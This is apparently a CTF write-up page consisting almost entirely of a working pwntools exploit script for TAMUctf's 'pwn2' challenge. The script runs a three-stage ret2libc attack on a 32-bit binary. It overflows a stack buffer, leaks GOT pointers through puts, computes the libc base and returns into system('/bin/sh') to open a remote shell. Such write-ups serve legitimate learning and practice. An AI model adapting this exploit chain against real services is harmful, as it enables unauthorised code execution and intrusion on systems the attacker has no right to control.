Tags: pwntools python rop 

Rating:

```
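#!/bin/python
"""Exploit for pwn2 in TAMUctf: a three-stage ret2plt / ret2libc chain on a
32-bit binary.

Stages 1 and 2 each overflow the stack buffer with ``pad_sz`` bytes of
padding, call ``puts(<GOT entry>)`` and return into ``REENTER`` so the
vulnerable function runs again and the next stage can be sent over the same
connection. The two leaked pointers pin the remote libc; stage 3 returns into
``system("/bin/sh")``.

Written in the Python 2 pwntools era but kept runnable under Python 3 /
pwntools 4.x: every payload piece is ``bytes`` and ``print`` is a function.
"""

from __future__ import print_function

from pwn import *

DEBUG = False

binary = "pwn2"
libc_loc = "libc.so.6"  # libc matched offline from the two leaks below; saves time on the shell stage.
host, port = "pwn.ctf.tamu.edu", 4322

# Registering the binary with context fixes arch/bits for flat()/unpack()
# instead of relying on the 32-bit default.
e = context.binary = ELF(binary)

# Address returned to after each puts() call: re-enters the vulnerable
# function so the next stage can be sent on the same connection.
REENTER = 0x0804862e

# Breakpoint just before the vulnerable return (local debugging only).
gdbscript = "b *0x80485f5\n"
gdbscript += "c\n"

if DEBUG:
    p = process(binary)
    libc = ELF("/lib32/libc.so.6")
    gdb.attach(p.pid, gdbscript)
else:
    libc = ELF(libc_loc)
    p = remote(host, port)

pad_sz = 0xf3          # bytes from the start of the buffer to the saved return address
tag = b"tagg"          # marker appended after the chain so the leak can be located in the echoed output
padding = cyclic(pad_sz)


def leak_got(sym):
    """Overflow with puts(GOT[sym]) and return the 4-byte pointer puts prints.

    Sends padding + [puts@plt, REENTER, GOT[sym]] + tag. The echoed input ends
    with ``tag`` plus the newline puts appends; the next four bytes are the
    leaked pointer. recvn() is used rather than recv() so a fragmented TCP
    read cannot hand unpack() fewer than four bytes.
    """
    chain = flat([e.plt['puts'], REENTER, e.got[sym]])
    p.sendline(padding + chain + tag)
    print(p.recvuntil(tag + b"\n"))  # everything up to here is echoed input
    addr = unpack(p.recvn(4))
    print("%s: %#x" % (sym, addr))
    return addr


# First leak
puts = leak_got('puts')
print("Remaining data...", p.recv())  # drain whatever the re-entered function prints (diagnostic only)

# Second leak: the pair (puts, setvbuf) is what identified libc_loc offline,
# and below it doubles as a check that libc_loc really is the remote libc.
setvbuf = leak_got('setvbuf')

# Use the leaks to shell.
libc_base = puts - libc.symbols['puts']
if libc_base & 0xfff:
    log.error("libc base %#x is not page aligned; leak parsing is off", libc_base)
if setvbuf - libc.symbols['setvbuf'] != libc_base:
    log.error("setvbuf leak disagrees with puts leak: %s is not the remote libc", libc_loc)
log.success("libc base: %#x", libc_base)

system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b"/bin/sh\x00"))

# Shell
chain = flat([system, REENTER, binsh])
p.sendline(padding + chain + tag)
p.interactive()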
```